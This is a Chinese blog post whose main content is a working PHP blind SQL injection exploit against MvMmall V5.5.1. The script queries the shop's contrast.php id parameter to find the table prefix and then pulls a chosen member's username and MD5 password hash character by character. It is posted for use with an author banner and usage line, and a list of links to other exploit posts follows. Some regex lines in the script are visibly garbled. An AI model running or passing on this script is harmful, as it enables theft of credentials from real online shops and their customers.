Chinadu's Blog

利用代码如下：

< ?php
ini_set("max_execution_time",0);
error_reporting(7);

if ($argc != 4)
usage ();
$hostname = $argv [1];
$path = $argv [2];
$userid = $argv [3];
$prefix = "mvm_";
//$key = "abcdefghijklmnopqrstuvwxyz0123456789";
$pos = 1;
$chr = 0;

function usage ()
{
global $argv;
echo
"\n[+] MvMmall_V5.5.1 Blind SQL Injection Exploit".
"\n[+] Author: My5t3ry".
"\n[+] Site : http://hi.baidu.com/netstart".
"\n[+] Usage : php ".$argv[0]." ".
"\n[+] Ex. : php ".$argv[0]." localhost /shop 1".
"\n\n";
exit ();
}

function request ($hostname, $path, $query)
{
$fp = fsockopen ($hostname, 80);

if (!$fp) {
echo 'No response from '.$host; die;
}

$request = "GET {$path}/contrast.php?id={$query} HTTP/1.1\r\n".
"Host: {$hostname}\r\n".
"Connection: Close\r\n\r\n";

fputs ($fp, $request);

while (!feof ($fp))
$reply .= fgets ($fp, 1024);

fclose ($fp);
return $reply;
}

function lengthcolumns ($userid, $prefix)
{
global $path,$hostname;
$exit=0;
$length=0;
$i=0;
while ($exit==0)
{
$query = "-1) Or length((select member_id from ".$prefix."member_table Where uid={$userid}))=".$i."%23";

$query = str_replace (" ", "%20", $query);

$query = str_replace ("'", "%27", $query);

$reply = request ($hostname, $path, $query);

$i++;

preg_match ("/target=\"_blank\" title=\"(.+)\">

if ($i/>30) {die(" Exploit failed...");}

//echo $x [1];

if (strlen (trim ($x [1])) == 0)
$exit=0;
else
$exit=1;
}

$length=$i-1;

echo "[+]length -> ".$length;

return $length;
}

function exploit ($hostname, $path, $userid, $fld, $chr, $pos)
{
global $prefix;

$chr = ord ($chr);

$query = "-1) Or ASCII(SUBSTRING((SELECT {$fld} FROM ".$prefix."member_table WHERE uid={$userid}),{$pos},1))={$chr}%23";

$query = str_replace (" ", "%20", $query);

$query = str_replace ("'", "%27", $query);

$reply = request ($hostname, $path, $query);

preg_match ("/target=\"_blank\" title=\"(.+)\">

if (strlen (trim ($x [1])) == 0)
return false;
else
return true;
}

echo "\n-------------------------------------------------------------------------------\n\n";
echo " MvMmall_V5.5.1 Blind SQL Injection Exploit\n";
echo " By My5t3ry (http://hi.baidu.com/netstart)\n";
echo "\n-------------------------------------------------------------------------------\n\n";
echo "[~]Trying to get pre...\n";

$query = "-1))%23";

$reply = request ($hostname, $path, $query);

preg_match('/FROM `(.+)goods_table/ie',$reply,$match);

$prefix=$match[1];

if ($match[1]){echo "[+]Good Job!Wo Got The pre -/> ".$match[1]."\n";}else{die(" Exploit failed...");}

echo "[~]Trying to get username length...\n";

$length = lengthcolumns($userid, $prefix);

echo "\n[~]Trying to Crack...";
echo "\n[+]username -> ";

while ($pos < = $length)
{
$key = "abcdefghijklmnopqrstuvwxyz0123456789";

if (exploit ($hostname, $path, $userid, "member_id", $key [$chr], $pos))
{
echo $key [$chr];
$chr = -1;
$pos++;
}
$chr++;
}

$pos = 9;

echo "\n[+]password(md5) -> ";

while ($pos < = 24)
{
$key = "abcdef0123456789";

if (exploit ($hostname, $path, $userid, "member_pass", $key [$chr], $pos))
{
echo $key [$chr];
$chr = -1;
$pos++;
}
$chr++;
}

echo "\n[+]Done!";
echo "\n\n-------------------------------------------------------------------------------";
?>

相关文章

• 2010年05月8日 -- PhpCms 2008 Sp3 Blind SQL Injection Exploit(2)
• 2010年05月8日 -- PhpCms 2008 Sp3 Blind SQL Injection Exploit(1)
• 2012年02月10日 -- Xpath SQL Injection
• 2011年06月6日 -- Easy Media Script SQL Injection Vulnerability
• 2011年05月16日 -- kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images
• 2011年05月12日 -- Joomla Component com_hello SQL Injection Vulnerability
• 2010年12月16日 -- Exploits Linux Kernel <= 2.6.37 local privilege escalation
• 2010年08月26日 -- PuTTY 0.60 DLL Hijacking Exploit (winmm.dll)
• 2010年06月6日 -- Havij v1.1 Advanced SQL Injection
• 2010年04月15日 -- Remote Exploit Against the Aircrack-NG Tools svn r1675